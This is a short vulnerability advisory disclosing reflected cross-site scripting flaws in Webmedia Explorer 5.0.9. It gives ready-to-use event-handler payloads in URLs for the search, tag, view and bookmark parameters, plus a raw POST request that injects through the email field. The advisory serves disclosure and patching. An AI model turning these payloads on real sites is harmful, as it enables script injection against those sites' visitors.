Webmedia Explorer - Cross Site Scripting Vulnerability
Version Affected: 5.0.9 (newest is: 5.10.0)
Info: Webmedia Explorer is the alternative CMS engine that reads the hard disc and generates a
website realtime taking advantage of a very powerful rendering and data fetching caching system.
Credits: InterN0T
External Links:
http://www.webmediaexplorer.com/
-:: The Advisory ::-
Vulnerable Function / ID Calls:
search, tag, bookmark & "another function that registers all extra calls"
Cross Site Scripting: (by using event handlers)
http://[HOST]/webmediaexpl/htdocs/index.php?search=" onmouseover=alert(0) —
– Will be executed when a user moves his mouse over the search field.
http://[HOST]/webmediaexpl/htdocs/?tag=" onmouseover=alert(0) —
– Will be executed when a user moves his mouse over a tag.
http://[HOST]/webmediaexpl/htdocs/?view=2&thisisnotarealcall=')" onmouseover=alert(0) > —
– Will be executed when a user moves his mouse over the column field. (unlikely)
http://[HOST]/webmediaexpl/htdocs/index.php?dir=&bookmark=" onmouseover=alert(0) > —&action=edit
– Requires admin access, however since this is a hidden tag exploitation is highly unlikely.
POST Method - Cross Site Scripting:
Host: [HOST]
User-Agent: FireFox-3-RoXx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer:
http://[HOST]/webmediaexpl/htdocs/index.php?action=remember
Content-Type: application/x-www-form-urlencoded
Content-Length: 58
Post Content:
email=%22+onmouseover%3Dalert%280%29+%3E±–&captcha_code=
(the following was sent: " onmouseover=alert(0) > — )
-:: Solution ::-
Filtering event handlers should do the trick.
Conclusion:
A pretty secure system over all, nice to see.
Disclosure Information:
All of the best,
MaXe